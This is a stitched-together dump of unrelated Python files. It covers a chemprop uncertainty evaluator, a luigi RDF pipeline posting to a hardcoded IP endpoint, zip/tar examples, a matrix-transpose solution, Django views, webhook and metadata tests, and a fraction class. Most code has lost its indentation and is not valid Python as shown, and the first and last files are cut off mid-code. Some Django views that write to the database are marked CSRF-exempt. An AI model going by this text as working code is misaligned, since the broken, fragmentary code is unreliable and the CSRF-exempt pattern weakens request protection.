stdev_scaling = self.calibrator.scaling
self.calibrator.regression_calibrator_metric = original_metric
self.calibrator.scaling = original_scaling
bin_unc = split_unc[i]
bin_unc = (
bin_unc
/ np.expand_dims(original_scaling, axis=0)
* np.expand_dims(stdev_scaling, axis=0)
) # convert from interval to stdev as needed
mean_vars[:, i] = np.mean(np.square(bin_unc), axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
ence = np.mean(np.abs(mean_vars - rmses) / mean_vars, axis=1)
return ence.tolist()
class SpearmanEvaluator(UncertaintyEvaluator):
"""
    Class evaluating uncertainty performance using the Spearman rank correlation. The method produces
    better scores (closer to 1 in the [-1, 1] range) when the uncertainty values are predictive
    of the ranking of prediction errors.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
f"Spearman rank correlation is only appropriate for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
num_tasks = targets.shape[1]
spearman_coeffs = []
for i in range(num_tasks):
spmn = spearmanr(uncertainties[:, i], abs_error[:, i]).correlation
spearman_coeffs.append(spmn)
return spearman_coeffs
def build_uncertainty_evaluator(
evaluation_method: str,
calibration_method: str,
uncertainty_method: str,
dataset_type: str,
loss_function: str,
calibrator: UncertaintyCalibrator,
) -> UncertaintyEvaluator:
"""
Function that chooses and returns the appropriate :class: `UncertaintyEvaluator` subclass
for the provided arguments.
"""
supported_evaluators = {
"nll": {
"regression": NLLRegressionEvaluator,
"classification": NLLClassEvaluator,
"multiclass": NLLMultiEvaluator,
"spectra": None,
}[dataset_type],
"miscalibration_area": CalibrationAreaEvaluator,
"ence": ExpectedNormalizedErrorEvaluator,
"spearman": SpearmanEvaluator,
}
classification_metrics = [
"auc",
"prc-auc",
"accuracy",
"binary_cross_entropy",
"f1",
"mcc",
]
multiclass_metrics = [
"cross_entropy",
"accuracy",
"f1",
"mcc"
]
if dataset_type == "classification" and evaluation_method in classification_metrics:
evaluator_class = MetricEvaluator
elif dataset_type == "multiclass" and evaluation_method in multiclass_metrics:
evaluator_class = MetricEvaluator
else:
evaluator_class = supported_evaluators.get(evaluation_method, None)
if evaluator_class is None:
raise NotImplementedError(
f"Evaluator type {evaluation_method} is not supported. Avalable options are all calibration/multiclass metrics and {list(supported_evaluators.keys())}"
)
else:
evaluator = evaluator_class(
evaluation_method=evaluation_method,
calibration_method=calibration_method,
uncertainty_method=uncertainty_method,
dataset_type=dataset_type,
loss_function=loss_function,
calibrator=calibrator,
)
return evaluator
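# Usage sketch (toy numbers; assumes the chemprop package imported above is installed). Builds a
# Spearman evaluator for a single-task regression model with no calibrator.
if __name__ == "__main__":
    example_evaluator = build_uncertainty_evaluator(
        evaluation_method="spearman",
        calibration_method=None,
        uncertainty_method="ensemble",
        dataset_type="regression",
        loss_function="mse",
        calibrator=None,
    )
    print(example_evaluator.evaluate(
        targets=[[1.0], [2.0], [3.0], [4.0]],
        preds=[[1.1], [2.4], [2.9], [4.2]],
        uncertainties=[[0.05], [0.30], [0.10], [0.20]],
    ))  # one Spearman coefficient per task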
|
python
|
import json
import glob
import luigi
import os
from dlib.task_helpers import parse_yaml, extract_task_config
from dlib.task_helpers import read_data, generate_output_filename, run_init
from dlib.identifier import Identify
from dlib.parser import Parser
from dlib.process_router import Processor
from dlib.btriples import triplify, storify
'''
pipeline for the demo
1. pull from solr
2. convert
3. identify
4. parse
5. triples
'''
class RawTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
def requires(self):
return []
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'raw'
))
def run(self):
''' '''
self._configure()
data = read_data(self.input_file)
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def process_response(self, data):
'''
get the sha, the content, the url, and the harvest date
'''
content = data.get('raw_content', '').encode('unicode_escape')
content = content[content.index('<'):]
content = content.replace('\\n', ' ').replace('\\t', ' ')
content = content.replace('\\\\ufffd', ' ').replace('\\ufffd', ' ')
content = ' '.join(content.split())
content = content.strip()
url = data.get('url', '')
sha = data.get('sha', '')
harvest = data.get('tstamp', '')
return {
"content": content,
"url": url,
"sha": sha,
"harvest": harvest,
"digest": data.get("digest")
}
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Raw')
self.output_path = config.get('output_directory', '')
class IdentifyTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
identifiers = []
def requires(self):
return RawTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'identified'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Identify')
self.output_path = config.get('output_directory', '')
self.identifiers = config.get('identifiers', [])
def process_response(self, data):
''' check against the yaml config '''
content = data.get('content', '').encode('unicode_escape')
url = data.get('url', '')
parser = Parser(content)
identifier = Identify(
self.identifiers,
content,
url,
**{'parser': parser, 'ignore_case': True}
)
identifier.identify()
data['identity'] = identifier.to_json()
return data
class ParseTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
params = {}
def requires(self):
return IdentifyTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'parsed'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Parse')
self.output_path = config.get('output_directory', '')
self.params = config.get('params', {})
def process_response(self, data):
content = data.get('content', '').encode('unicode_escape')
url = data.get('url', '')
identity = data.get('identity', {})
processor = Processor(identity, content, url)
if not processor:
return {}
description = processor.reader.parse_service()
description['solr_identifier'] = data['sha']
description['source_url'] = url
del data['content']
data['service_description'] = description
return data
class TripleTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
params = {}
def requires(self):
return ParseTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'triples',
'.ttl'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data, document_urn = self.process_response(data)
if new_data is not None and new_data:
with open(self.output().path.replace('.ttl', '.txt'), 'w') as f:
f.write(document_urn)
with self.output().open('w') as out_file:
out_file.write(new_data)
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Triple')
self.output_path = config.get('output_directory', '')
self.params = config.get('params', {})
def process_response(self, data):
storage_endpoint = 'http://54.69.87.196:8080/parliament/sparql'
store, document_urn = triplify(data)
if store is not None:
# write it out to turtle for the idempotent output
turtle = store.serialize('turtle')
# post it to parliament
storify(storage_endpoint, triples_as_nt=store.serialize('nt'), option='INSERT')
return turtle, document_urn
return '', ''
class MainWorkflow(luigi.Task):
doc_dir = luigi.Parameter()
yaml_file = luigi.Parameter()
def requires(self):
return [TripleTask(input_file=f, yaml_file=self.yaml_file) for f in self._iterator()]
def output(self):
return luigi.LocalTarget('log.txt')
def run(self):
self._configure()
def _configure(self):
config = parse_yaml(self.yaml_file)
run_init(config)
def _iterator(self):
for f in glob.glob(os.path.join(self.doc_dir, '*.json')):
yield f
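# Example invocation (hypothetical module name and paths): run the full demo pipeline for every
# *.json document in a directory, using luigi's local scheduler.
#
#   python -m luigi --module demo_pipeline MainWorkflow \
#       --doc-dir /data/solr_docs --yaml-file configs/demo.yaml --local-scheduler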
|
python
|
# -*- coding: utf-8 -*-
# @version : ??
# @Time : 2017/3/29 17:31
# @Author : Aries
# @Site :
# @File : shutil_0329.py
# @Software: PyCharm
import zipfile
"""
压缩 解压 .zip包
"""
# 压缩
z = zipfile.ZipFile('laxi.zip', 'w')
z.write('test.txt')
z.write('test2.xml')
z.close()
# Extract
z = zipfile.ZipFile('laxi.zip', 'r')
z.extractall()
z.close()
import tarfile
"""
压缩 解压 .tar包
"""
# 压缩
tar = tarfile.open('two.tar', 'w')
tar.add('E:\Python3.6\practice', arcname='demo02.xml')
tar.add('E:\Python3.6\practice', arcname='test.txt')
tar.close()
# Extract
tar = tarfile.open('two.tar', 'r')
tar.extractall()  # an extraction path can be passed here
tar.close()
|
python
|
# Time: O(r * c)
# Space: O(1)
# Given a matrix A, return the transpose of A.
#
# The transpose of a matrix is the matrix flipped over it's main diagonal,
# switching the row and column indices of the matrix.
#
# Example 1:
#
# Input: [[1,2,3],[4,5,6],[7,8,9]]
# Output: [[1,4,7],[2,5,8],[3,6,9]]
# Example 2:
#
# Input: [[1,2,3],[4,5,6]]
# Output: [[1,4],[2,5],[3,6]]
#
# Note:
# - 1 <= A.length <= 1000
# - 1 <= A[0].length <= 1000
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class Solution(object):
def transpose(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
result = [[None] * len(A) for _ in xrange(len(A[0]))]
for r, row in enumerate(A):
for c, val in enumerate(row):
result[c][r] = val
return result
# Time: O(r * c)
# Space: O(1)
class Solution2(object):
def transpose(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
        return [list(row) for row in zip(*A)]  # materialize so the declared rtype also holds on Python 3
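# Quick check (sketch) on the example from the problem statement above.
if __name__ == "__main__":
    print(Solution().transpose([[1, 2, 3], [4, 5, 6]]))   # [[1, 4], [2, 5], [3, 6]]
    print(Solution2().transpose([[1, 2, 3], [4, 5, 6]]))  # [[1, 4], [2, 5], [3, 6]]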
|
python
|
import logging
from typing import List
from api.token.service import Token
from api.calendar.service import CalendarService, Calendar
LOG = logging.getLogger(__name__)
class GoogleCalendarService(CalendarService):
IGNORED_CALENDARS = {'addressbook#[email protected]',
'en.polish#[email protected]'}
def __init__(self, api_client):
self.api_client = api_client
    def __retrieve_identifiers(self, calendars):
        # Filter on the raw calendar id (IGNORED_CALENDARS holds id strings) before wrapping
        # the remaining entries in Calendar objects.
        return [Calendar(identifier=item['id'])
                for item in calendars.get('items', [])
                if item['id'] not in self.IGNORED_CALENDARS]
def fetch(self, token: Token) -> List[Calendar]:
params = {}
calendars = self.api_client.get('calendar/v3/users/me/calendarList', token.value, params)
return self.__retrieve_identifiers(calendars)
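# Usage sketch with stand-in collaborators (the real api_client and Token come from the api
# package imported above; the stubs below only mimic the attributes this service touches).
if __name__ == "__main__":
    class _StubToken:
        value = "dummy-access-token"

    class _StubApiClient:
        def get(self, path, token_value, params):
            # Shape mirrors the calendarList response read by fetch().
            return {'items': [{'id': 'example-calendar-id'}]}

    print(GoogleCalendarService(_StubApiClient()).fetch(_StubToken()))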
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup
import codecs
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), 'r') as fp:
return fp.read()
def get_version(rel_path):
    for line in read(rel_path).splitlines():
        if line.startswith('__version__'):
            delim = '"' if '"' in line else "'"
            return line.split(delim)[1]
    else:
        # for/else: only reached when no line started with __version__
        raise RuntimeError("Unable to find version string.")
with open('README.rst') as readme_file:
readme = readme_file.read()
setup(
name='fedmix_backend',
version=get_version('fedmix_backend/__version__.py'),
description="GraphQL backend for the fedmix frontend",
long_description=readme + '\n\n',
author="Berend Weel",
author_email='[email protected]',
url='https://github.com/FEDMix/fedmix_backend',
packages=[
'fedmix_backend',
],
install_requires=[
'graphene>=2.1.8, <3',
'flask>=1.1.2, <2',
'flask-graphql>=2.0.1, <3',
'natsort>=7, <8',
],
include_package_data=True,
license="Apache Software License 2.0",
zip_safe=False,
keywords='fedmix-backend',
entry_points={
'console_scripts':
['fedmix-backend=fedmix_backend.fedmix_backend:main'],
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
test_suite='tests',
setup_requires=[
'wheel',
# dependency for `python setup.py test`
'pytest-runner',
# dependencies for `python setup.py build_sphinx`
'sphinx',
'sphinx_rtd_theme',
'recommonmark'
],
tests_require=[
'pytest',
'pytest-cov',
'pytest-pylint',
],
extras_require={
'dev': ['prospector[with_pyroma]', 'yapf', 'isort'],
},
)
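# Note: get_version() above expects fedmix_backend/__version__.py to contain a line of the form
#
#   __version__ = '0.1.0'
#
# (the version number shown here is only an example).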
|
python
|
from Handler import Handler
class Logout(Handler):
""" handles user logout safely """
def get(self):
self.logout()
self.redirect('/login')
return
|
python
|
import numpy as np
import inspect # Used for storing the input
from .element import Element
from .equation import PotentialEquation
__all__ = ['Constant', 'ConstantStar']
class ConstantBase(Element, PotentialEquation):
def __init__(self, model, xr=0, yr=0, hr=0.0, layer=0, \
name='ConstantBase', label=None, aq=None):
self.storeinput(inspect.currentframe())
Element.__init__(self, model, nparam=1, nunknowns=1, layers=layer, \
name=name, label=label)
self.nparam = 1 # Defined here and not in Element as other elements can have multiple parameters per layers
self.nunknowns = 0
self.xr = xr
self.yr = yr
self.hr = hr
self.aq = aq
self.model.add_element(self)
def __repr__(self):
return self.name + ' at ' + str(
(self.xr, self.yr)) + ' with head ' + str(self.hr)
def initialize(self):
if self.aq is None:
self.aq = self.model.aq.find_aquifer_data(self.xr, self.yr)
self.aq.add_element(self)
self.ncp = 1
self.xc = np.array([self.xr])
self.yc = np.array([self.yr])
self.pc = self.hr * self.aq.T[self.layers]
self.parameters = np.atleast_2d(self.pc)
def potinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
if aq == self.aq:
rv[0, 0] = 1
return rv
def disvecinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
class Constant(ConstantBase, PotentialEquation):
"""
Specify the head at one point in the model in one layer.
The head may only be specified in an area of the model where
the aquifer system is confined.
Parameters
----------
model : Model object
model to which the element is added
xr : float
x-coordinate of the point where the head is specified
yr : float
y-coordinate of the point where the head is specified
hr : float
specified head
layer : int
layer where the head is specified
label : string or None (default: None)
label of the element
"""
def __init__(self, model, xr=0, yr=0, hr=0.0, layer=0, label=None):
self.storeinput(inspect.currentframe())
ConstantBase.__init__(self, model, xr=xr, yr=yr, hr=hr, layer=layer, \
name='Constant', label=label)
self.nunknowns = 1
def initialize(self):
ConstantBase.initialize(self)
assert self.aq.ilap, 'Constant element added to area that is ' \
'semi-confined'
self.resfac = np.zeros(1) # required for HeadEquation
self.strengthinf = np.zeros(1) # required for HeadEquation
def setparams(self, sol):
self.parameters[:, 0] = sol
class ConstantInside(Element):
# Sets constant at points xc, yc equal to the average of the potential of all elements at points xc, yc
# Used for the inside of an inhomogeneity
def __init__(self, model, xc=0, yc=0, label=None):
Element.__init__(self, model, nparam=1, nunknowns=1,
layers=list(range(model.aq.naq)), \
name='ConstantInside', label=label)
self.xc = np.atleast_1d(xc)
self.yc = np.atleast_1d(yc)
self.parameters = np.zeros((1, 1))
self.model.add_element(self)
def __repr__(self):
return self.name
def initialize(self):
self.aq = self.model.aq.find_aquifer_data(self.xc[0], self.yc[0])
self.aq.add_element(self)
self.ncp = len(self.xc)
def potinf(self, x, y, aq=None):
'''Can be called with only one x,y value'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
if aq == self.aq:
rv[0, 0] = 1
return rv
def disvecinf(self, x, y, aq=None):
'''Can be called with only one x,y value'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
def equation(self):
mat = np.zeros((1, self.model.neq))
rhs = np.zeros(1) # Needs to be initialized to zero
for icp in range(self.ncp):
ieq = 0
for e in self.model.elementlist:
                if e.nunknowns > 0:
                    if e != self:
                        mat[0:, ieq:ieq + e.nunknowns] += \
                            e.potinflayers(self.xc[icp], self.yc[icp],
                                           self.layers).sum(0)
                    ieq += e.nunknowns
# else:
# mat[0, ieq:ieq+e. nunknowns] += -1
else:
rhs[0] -= \
e.potentiallayers(self.xc[icp], self.yc[icp],
self.layers).sum(0)
return mat, rhs
def setparams(self, sol):
self.parameters[:, 0] = sol
#class ConstantStar(Element, PotentialEquation):
# I don't think we need the equation
class ConstantStar(Element):
def __init__(self, model, hstar=0.0, label=None, aq=None):
Element.__init__(self, model, nparam=1, nunknowns=0, layers=0, \
name='ConstantStar', label=label)
assert hstar is not None, 'a value for hstar needs to be specified'
self.hstar = hstar
self.aq = aq
self.model.add_element(self)
def __repr__(self):
return self.name + ' with head ' + str(self.hstar)
def initialize(self):
self.aq.add_element(self)
self.aq.constantstar = self
self.parameters = np.zeros((1, 1))
self.potstar = self.hstar * self.aq.T
def potinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
return rv
def potentiallayers(self, x, y, layers, aq=None):
'''Returns array of size len(layers) only used in building equations
Defined here as it is the particular solution inside a semi-confined aquifer
and cannot be added by using eigen vectors'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
pot = np.zeros(len(layers))
if aq == self.aq:
pot[:] = self.potstar[layers]
return pot
def disvecinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
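# Usage sketch (hypothetical; assumes an analytic-element Model class from the surrounding
# package that exposes `model.aq` and `model.add_element`, as the elements above require):
#
#   ml = Model(...)                                      # some aquifer model
#   rf = Constant(ml, xr=0.0, yr=0.0, hr=20.0, layer=0)  # fix the head to 20 at (0, 0) in layer 0
#   ml.solve()                                           # Constant contributes one unknown to the system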
|
python
|
from mangofmt import MangoFile, EncryptionType, CompressionType, Language
def test_title():
mango = MangoFile()
meta = mango.meta_data
assert meta.title == None
meta.title = "test"
assert meta.title == "test"
def test_author():
mango = MangoFile()
meta = mango.meta_data
assert meta.author == None
meta.author = "test"
assert meta.author == "test"
def test_publisher():
mango = MangoFile()
meta = mango.meta_data
assert meta.publisher == None
meta.publisher = "test"
assert meta.publisher == "test"
def test_source():
mango = MangoFile()
meta = mango.meta_data
assert meta.source == None
meta.source = "test"
assert meta.source == "test"
def test_translation():
mango = MangoFile()
meta = mango.meta_data
assert meta.translation == None
meta.translation = "test"
assert meta.translation == "test"
def test_volume():
mango = MangoFile()
meta = mango.meta_data
assert meta.volume == None
meta.volume = 2
assert meta.volume == 2
def test_chapter():
mango = MangoFile()
meta = mango.meta_data
assert meta.chapter == None
meta.chapter = 2
assert meta.chapter == 2
def test_year():
mango = MangoFile()
meta = mango.meta_data
assert meta.year == None
meta.year = 2
assert meta.year == 2
def test_language():
mango = MangoFile()
meta = mango.meta_data
assert meta.language == None
meta.language = Language.EN
assert meta.language == Language.EN
|
python
|
import simplejson as json
from django.db.models import Q
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
import directory.models as directory
from appconf.manager import SettingManager
from laboratory.decorators import group_required
from podrazdeleniya.models import Podrazdeleniya
@ensure_csrf_cookie
@login_required
def menu(request):
return redirect('/ui/construct/menu')
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches(request):
""" Конструктор исследований """
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'construct_researches.html', {"labs": labs, "variants": directory.ResultVariants.objects.all()})
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches_tune(request):
""" Настройка исследований """
pk = request.GET["pk"]
return render(request, 'construct_researches_tune.html', {"pk": pk, "material_types": directory.MaterialVariants.objects.all()})
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches_tune_ng(request):
""" Настройка исследований """
pk = request.GET["pk"]
return render(request, 'construct_researches_tune_ng.html', {"pk": pk})
@login_required
@group_required("Оператор", "Конструктор: Ёмкости для биоматериала")
@ensure_csrf_cookie
def tubes(request):
""" Создание и редактирование ёмкостей """
return render(request, 'construct_tubes.html')
@login_required
@group_required("Оператор", "Конструктор: Группировка исследований по направлениям")
@ensure_csrf_cookie
def directions_group(request):
""" Группировка по направлениям """
labs = Podrazdeleniya.objects.filter(Q(p_type=Podrazdeleniya.LABORATORY) | Q(p_type=Podrazdeleniya.PARACLINIC))
return render(request, 'construct_directions_group.html', {"labs": labs})
@login_required
@group_required("Оператор", "Конструктор: Настройка УЕТов")
@ensure_csrf_cookie
def uets(request):
""" Настройка УЕТов """
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'uets.html', {"labs": labs})
@csrf_exempt
@login_required
@group_required("Оператор", "Группировка исследований по направлениям")
@ensure_csrf_cookie
def onlywith(request):
""" Настройка назначения анализов вместе """
if request.method == "GET":
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'onlywith.html', {"labs": labs})
elif request.method == "POST":
pk = int(request.POST["pk"])
onlywith_value = int(request.POST.get("onlywith", "-1"))
res = directory.Researches.objects.get(pk=pk)
if onlywith_value > -1:
res.onlywith = directory.Researches.objects.get(pk=onlywith_value)
res.save()
else:
res.onlywith = None
res.save()
return JsonResponse({"ok": True})
@csrf_exempt
@login_required
def refs(request):
""" Настройка назначения анализов вместе """
if request.method == "GET":
rows = []
fraction = directory.Fractions.objects.get(pk=int(request.GET["pk"]))
for r in directory.References.objects.filter(fraction=fraction).order_by("pk"):
rows.append(
{
'pk': r.pk,
'title': r.title,
'about': r.about,
'ref_m': json.loads(r.ref_m) if isinstance(r.ref_m, str) else r.ref_m,
'ref_f': json.loads(r.ref_f) if isinstance(r.ref_f, str) else r.ref_f,
'del': False,
'hide': False,
'isdefault': r.pk == fraction.default_ref_id,
}
)
return JsonResponse(rows, safe=False)
elif request.method == "POST":
pk = int(request.POST["pk"])
default = int(request.POST["default"])
if pk > -1:
fraction = directory.Fractions.objects.get(pk=pk)
for r in json.loads(request.POST["refs"]):
r["ref_m"].pop("", None)
r["ref_f"].pop("", None)
if r["del"] and r["pk"] != -1:
directory.References.objects.filter(pk=r["pk"]).delete()
if r["pk"] == default:
default = -1
elif not r["del"] and r["pk"] == -1:
nrf = directory.References(title=r["title"], about=r["about"], ref_m=r["ref_m"], ref_f=r["ref_f"], fraction=fraction)
nrf.save()
if r["isdefault"]:
default = nrf.pk
else:
row = directory.References.objects.get(pk=r["pk"])
row.title = r["title"]
row.about = r["about"]
row.ref_m = json.dumps(r["ref_m"])
row.ref_f = json.dumps(r["ref_f"])
row.save()
fraction.default_ref = None if default == -1 else directory.References.objects.get(pk=default)
fraction.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Оператор", "Конструктор: Параклинические (описательные) исследования")
@ensure_csrf_cookie
def researches_paraclinic(request):
if SettingManager.get("paraclinic_module", default='false', default_type='b'):
return render(request, 'construct_paraclinic.html')
else:
return redirect('/')
@login_required
@group_required("Оператор", "Конструктор: консультации")
@ensure_csrf_cookie
def construct_consults(request):
if SettingManager.get("consults_module", default='false', default_type='b'):
return render(request, 'construct_consults.html')
else:
return redirect('/')
@login_required
@group_required("Оператор", "Конструктор: Настройка шаблонов")
@ensure_csrf_cookie
def construct_templates(request):
return render(request, 'construct_templates.html')
@login_required
@group_required("Оператор", "Конструктор: Настройка микробиологии")
@ensure_csrf_cookie
def construct_bacteria(request):
return render(request, 'construct_bacteria.html')
@login_required
@group_required("Конструктор: Д-учет")
@ensure_csrf_cookie
def construct_dispensary_plan(request):
return render(request, 'construct_dplan.html')
|
python
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Tests of deployment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import base64
import mock
from asyncat.client import GithubError
from hindsight.finder import NoSuchPullRequest
from . import HindsightTestCase
class BuildbotTestCase(HindsightTestCase):
"""Tests for buildbot."""
def _get_packets(self):
"""Returns test packets."""
with open(self.get_file_path("_buildbot-packets.json")) as f:
return f.read()
def test_secret_mismatch(self):
"""Secret mismatch should returns 403."""
resp = self.fetch("/deployment", body=self.make_body({
"secret": "secret",
"packets": self._get_packets()
}), method="POST")
self.assertEqual(resp.code, 403)
def _push(self):
"""Push event."""
return self.fetch("/deployment", body=self.make_body({
"secret": "mock-secret",
"packets": self._get_packets()
}), method="POST")
@mock.patch("hindsight.app.Application.find_pull", autospec=True)
def test_pull_not_found(self, mock_find_pull):
"""Pull request not found."""
mock_find_pull.return_value = self.make_future(NoSuchPullRequest())
resp = self._push()
self.assertEqual(resp.code, 200)
self.assertEqual(resp.body, b'OK')
mock_find_pull.return_value = self.make_future(GithubError())
resp = self._push()
self.assertEqual(resp.code, 404)
@mock.patch("hindsight.finder.PullRequestFinder.find", autospec=True)
def test_find_pull_via_sha(self, mock_find):
"""Find pull request via sha in event."""
mock_pull_cls = mock.create_autospec("asyncat.repository.PullRequest")
mock_pull = mock_pull_cls.return_value
mock_pull.create_comment.return_value = self.make_future(None)
mock_find.return_value = self.make_future(mock_pull)
self._push()
self.assertTrue(mock_pull.create_comment.called)
class Buildbot9TestCase(HindsightTestCase):
"""Buildbot 9 test case."""
def _get_payload(self, type_="done"):
"""Returns test payload."""
with open(self.get_file_path("_buildbot9-{}.json".format(type_))) as f:
return f.read()
def test_secret_mismatch(self):
"""Secret mismatch should returns 403."""
resp = self.fetch(
"/deployment",
body=self._get_payload(),
headers={
"Authorization": "Basic {}".format(
base64.b64encode(
"buildbot:{}".format("secret").encode("utf8")
).decode("utf8"),
)
},
method="POST",
)
self.assertEqual(resp.code, 403)
def _push(self, type_):
"""Push event."""
return self.fetch(
"/deployment",
body=self._get_payload(type_),
headers={
"Authorization": "Basic {}".format(
base64.b64encode(
"buildbot:{}".format("mock-secret").encode("utf8"),
).decode("utf8"),
)
},
method="POST",
)
@mock.patch("hindsight.app.Application.find_pull", autospec=True)
def test_pull_not_found(self, mock_find_pull):
"""Could not found pull request."""
mock_find_pull.return_value = self.make_future(NoSuchPullRequest())
resp = self._push("done")
self.assertEqual(resp.code, 200)
self.assertEqual(resp.body, b'OK')
mock_find_pull.return_value = self.make_future(GithubError())
resp = self._push("done")
self.assertEqual(resp.code, 404)
@mock.patch("hindsight.finder.PullRequestFinder.find", autospec=True)
def test_find_pull_via_sha(self, mock_find):
"""Find pull request via sha in event."""
mock_pull_cls = mock.create_autospec("asyncat.repository.PullRequest")
mock_pull = mock_pull_cls.return_value
mock_pull.create_comment.return_value = self.make_future(None)
mock_find.return_value = self.make_future(mock_pull)
self._push("done")
self.assertTrue(mock_pull.create_comment.called)
|
python
|
def mdc(m, n):
while m % n != 0:
oldm = m
oldn = n
m = oldn
n = oldm % oldn
return n
def separadorFrac(frac):
novoNum = frac.getNum()
inteiro = 0
while novoNum > frac.getDen():
novoNum -= frac.getDen()
inteiro += 1
return inteiro, novoNum
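# Example (sketch, not part of the original script):
#   separadorFrac(Fracao(7, 6)) == (1, 1)   # 7/6 -> 1 whole with 1/6 left over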
def somarInteiro(parteInteira, parteNum):
inteiro = parteInteira + parteNum
return inteiro
class Fracao:
def __init__(self, num, den):
self.__num = num
self.__den = den
def __str__(self):
return str(self.__num) + "/" + str(self.__den)
def getNum(self):
return self.__num
def getDen(self):
return self.__den
def simplifica(self):
divComum = mdc(self.__num, self.__den)
self.__num = self.__num // divComum
self.__den = self.__den // divComum
def __add__(self, outraFrac):
novoNum = self.__num * outraFrac.getDen() + self.__den * outraFrac.getNum()
novoDen = self.__den * outraFrac.getDen()
divComum = mdc(novoNum, novoDen)
return Fracao(novoNum//divComum, novoDen//divComum)
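    # Worked example (sketch, for illustration only): Fracao(7, 6) + Fracao(13, 7)
    #   numerator   = 7*7 + 6*13 = 49 + 78 = 127
    #   denominator = 6*7 = 42,  mdc(127, 42) = 1  ->  result 127/42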
class fracaoMista(Fracao):
def __init__(self, parteInteira, num, den):
super().__init__(num, den)
self.__parteInteira = parteInteira
def getParteInteira(self):
return self.__parteInteira
def juntar(self):
novoNum = (self.__parteInteira * self.getDen()) + self.getNum()
return Fracao(novoNum, self.getDen())
def __add__(self, outraFrac):
novoNum = self.getNum() * outraFrac.getDen() + self.getDen() * outraFrac.getNum()
novoDen = self.getDen() * outraFrac.getDen()
divComum = mdc(novoNum, novoDen)
return Fracao(novoNum//divComum, novoDen//divComum)
def __str__(self):
if self.__parteInteira > 0 and self.getNum() < self.getDen():
return str(self.__parteInteira) + ' ' + str(self.getNum()) + '/' + str(self.getDen())
elif self.__parteInteira >= 0 and self.getNum() == self.getDen():
inteiro = somarInteiro(self.__parteInteira, 1)
return str(inteiro)
else:
return str(self.getNum()) + '/' + str(self.getDen())
frac1 = Fracao(7, 6)
frac2 = Fracao(13, 7)
frac3 = frac1 + frac2
inteiro, numerador = separadorFrac(frac3)
print(fracaoMista(inteiro, numerador, frac3.getDen()))
print()
frac1 = Fracao(1, 3)
frac2 = Fracao(2, 3)
frac3 = frac1 + frac2
inteiro, numerador = separadorFrac(frac3)
